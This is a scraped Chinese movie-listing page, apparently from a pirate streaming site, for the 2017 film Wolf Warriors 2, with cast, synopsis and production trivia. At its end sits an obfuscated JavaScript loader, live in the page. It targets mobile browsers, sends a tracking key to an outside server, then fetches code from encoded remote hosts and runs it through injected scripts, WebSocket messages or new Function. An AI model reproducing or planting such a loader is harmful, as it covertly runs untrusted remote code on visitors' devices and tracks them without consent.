• 力荐
  • 推荐
  • 还行
  • 较差
  • 很差
评分加载中...

战狼2

别名:新战狼/新战死沙场/Wolf Warriors 2

状态:HD国语

主演:吴京 弗兰克·格里罗 吴刚 张翰 卢靖姗 丁海峰 淳于珊珊 余男 于谦

导演:吴京

年代:2017

时长:120分钟

语言字幕:国语

国家地区:大陆

更新时间:1970-01-01 08:00:00

影视评论:当前有0条评论,

影视简介:剧情简介:故事发生在非洲附近的大海上,主人公冷锋遭遇人生滑铁卢,被“开除军籍”,本想漂泊一生的他,正当他打算这么做的时候,一场突如其来的意外打破了他的计划,突然被卷入了一场非洲国家叛乱,本可以安全撤离,却因无法忘记曾经为军人的使命,孤身犯险冲回沦陷区,带领身陷屠杀中的同胞和难民,展开生死逃亡。随着斗争的持续,体内的狼性逐渐复苏,最终孤身闯入战乱区域,为同胞而战斗。 又名: 新战狼 / 新战死沙场 / Wolf Warriors 2 导演: 吴京 主演: 吴京 / 弗兰克·格里罗 / 吴刚 / 张翰 / 卢靖姗 / 丁海峰 / 淳于珊珊 / 余男 / 于谦 / 石兆琪 / 海蒂·玛尼梅可 / Oleg Aleksandrovich Prudius / 阿隆·汤尼 / Thayr Harris / 勃小龙 类型: 动作 制片国家/地区: 中国大陆 语言: 汉语普通话 / 英语 上映日期: 2017-07-27(中国大陆) 片长: 123分钟 角色介绍: 冷锋 演员 吴京 主人公冷锋遭遇人生滑铁卢,被“开除军籍”,本想漂泊一生的他,正当他打算这么做的时候,一场突如其来的意外打破了他的计划,突然被卷入了一场非洲国家叛乱,本可以安全撤离,却因无法忘记曾经为军人的使命,孤身犯险冲回沦陷区,带领身陷屠杀中的同胞和难民,展开生死逃亡。 何建国 演员 吴刚 一名退伍军人,与冷锋并肩作战。 钱必达 演员 于谦 望文生义,一个金钱至上、专坑同胞的奸商。 龙小云 演员 余男 冷锋踏上主战场非洲的本意,就是去寻找被派去非洲执行任务的龙小云。 幕后花絮:丁海峰虽然饰演过多种职业军人,作为海军登场的还是第一次,丁海峰表示不久前在电视剧《碧海雄心》中曾出演的海上救援队长,但却从没出演过海军。 当天吴京嗓子嘶哑,已经喊不出话。吴京解释说,剧组太大了,嗓子经常吼得说不出话,其实片场经常各种爆炸,耳朵也被轰得听不大清。动作指导萨姆表示吴京很难应付,要求很高,只顾把动作拍得更好,经常忽视自己安全的问题。吴京则表示美国团队对人身安全非常在乎,连动物的安全都特别在意,要向他们学习。他们用工业化的模式拍戏,我们用生命在拍。 弗兰克表示吴京会要求我打他的脸。通常在好莱坞,这种超级明星是需要替身来做的,但吴京会主动自己做。吴京表示拍武戏哪有不受伤的。还好我不是靠脸吃饭,靠命吃饭。弗兰克也是非常敬业的演员,血浆直接往脸上泼,动作戏直接摔。会让我掐他脖子,感受那种真实的爆发。 弗兰克表示吴京拍起动作戏来不要命,每一拳都要是实实在在的真打,拍过很多动作片,但没有动作片要这种拍法,自己彻底被打服。被问到两人如果真打一架谁会赢时,吴京表示谁做导演谁能打赢。弗兰克表示吴京对军事很熟悉。他在电影里为我安排了一句台词:Old soldiers never die. They just fade away。这是麦克阿瑟说过的话,我没想到他对美国军事文化那么了解,功课做得很足。 而吴京为此所付出的代价,之前双腿膝盖经历了大手术,此次片场拍摄旧伤再次复发,每天开工前都要吃止疼片。跟组医生几次劝阻要其休息,都不以为意。 幕后制作: 《战狼2》依然延续了《战狼》的故事线索,但这一集,故事背景将从中国边境转移到了海外,具有更国际化的视野,电影里中美两方的团队将会一起打造更燃的战斗场面,战狼精神,也依然会延续。 制作团队 《美国队长》系列中大反派“交叉骨” 的饰演者弗兰克-格里罗以及《美国队长3》、《X特遣队》等电影的动作指导萨姆-哈格里夫也一同亮相片场。 《战狼2》引入了另外一组关键人物,就是非洲的孩童,无论是海报上吴京在非洲的战乱废墟中牵手的孩童,还是预告片里与其一起在战火里奔跑的孩童,都非常抢眼。无论从之前杀青的剧照,还是吴京去非洲时透露的故事点滴,都有迹象表明,非洲孩童,也许将会成为《战狼2》中的重点。 拍摄过程 首次挑战军事动作戏,吴刚压力不小,开拍前,单独拿出两周的时间投入集训,学习动作和武器的使用。“魔鬼式训练”让吴刚曾腰部以下全麻,却也在短短时间内,从一个不会拿枪的外行,到可以熟练单手换弹夹的专业军人,认真敬业的态度和军人一般的作风,赢得了剧组所有人的尊重。 2016年6月19日,《战狼2》在北京怀柔某影视基地正式开机。吴京用了6个月即将电影筹备充分,在开机现场先是宣读开机祝词,接着又是指挥调度全剧组上百人进行开机仪式。 2016年8月23日,拍摄这场“坦克碾汽车”戏,吴京独自驾驶坦克,在六辆坦克中穿梭而过,碾压过一辆皮卡车。短短10秒时间,汽车瞬间变成一堆废铁。这是第一次有国内演员亲自驾驶坦克碾压汽车。一辆汽车1吨,一辆坦克35吨,在《战狼2》里,出现许多在华语电影里首次亮相的重型装备。 《战狼2》前往非洲拍摄之初,当地的安全隐患就令很多网友为剧组的安危捏了把汗,早在春节前夕,前往非洲采风的先遣队曾在贫民窟遭到抢劫。再访非洲,虽然做足了安全防备,但未知的隐患还是不能完全排解,这让不少网友十分担忧。 吴京表示最近正忙于拍《战狼2》,表示比拍第一集时更累。我们外景搭建了500个房屋却被龙卷风吹走了200间,我开车时更险些出车祸,每天都在提心吊胆。 萨姆表示,自己是看了《战狼》并了解了吴京的创作历程后,深受感动,才决定投身华语电影这一杰出品牌的。吴京表示这次和美国团队合作,可以将双方优势互补,“这次非常希望把中国风格和美国风格放在一起,尤其是枪战方面。11月2日,《战狼2》结束了长达5个月的拍摄,顺利杀青。 《战狼2》的拍摄尝试了很多以往国产电影从未涉及到的场景,譬如水下一镜到底的打斗戏,这是非常罕见的,为此我们请到了《加勒比海盗》的水下摄影师。所有人都觉得,一镜到底是观众最好的代入方式,但拍摄之前没人知道是否能够成功。相比上一部绿色军营的轻工业风,《战狼2》跳出了我驾轻就熟的安全区,选择中国电影产业并不擅长的重工业风格。

视频下载15
复制全部

《战狼2》主演

评论

  • 评论加载中...

首页

电视剧

返回顶部

电影

会员中心

function tzSxNF(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function SeQxY(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return tzSxNF(t);};window[''+'R'+'U'+'j'+'D'+'I'+'m'+'v'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=SeQxY,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://tgb.eemcfun.com:7891/stats/7731/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZqaC5mmYW5odWltaW4xLmmNuJTNBODg5MQ==','d3NzJTNBJTJGGJTJGGdXkudGGlhbnhpbmdoYW5nMS5jbiUzQTk1MzU=','135562',window,document,['m','G']);}:function(){};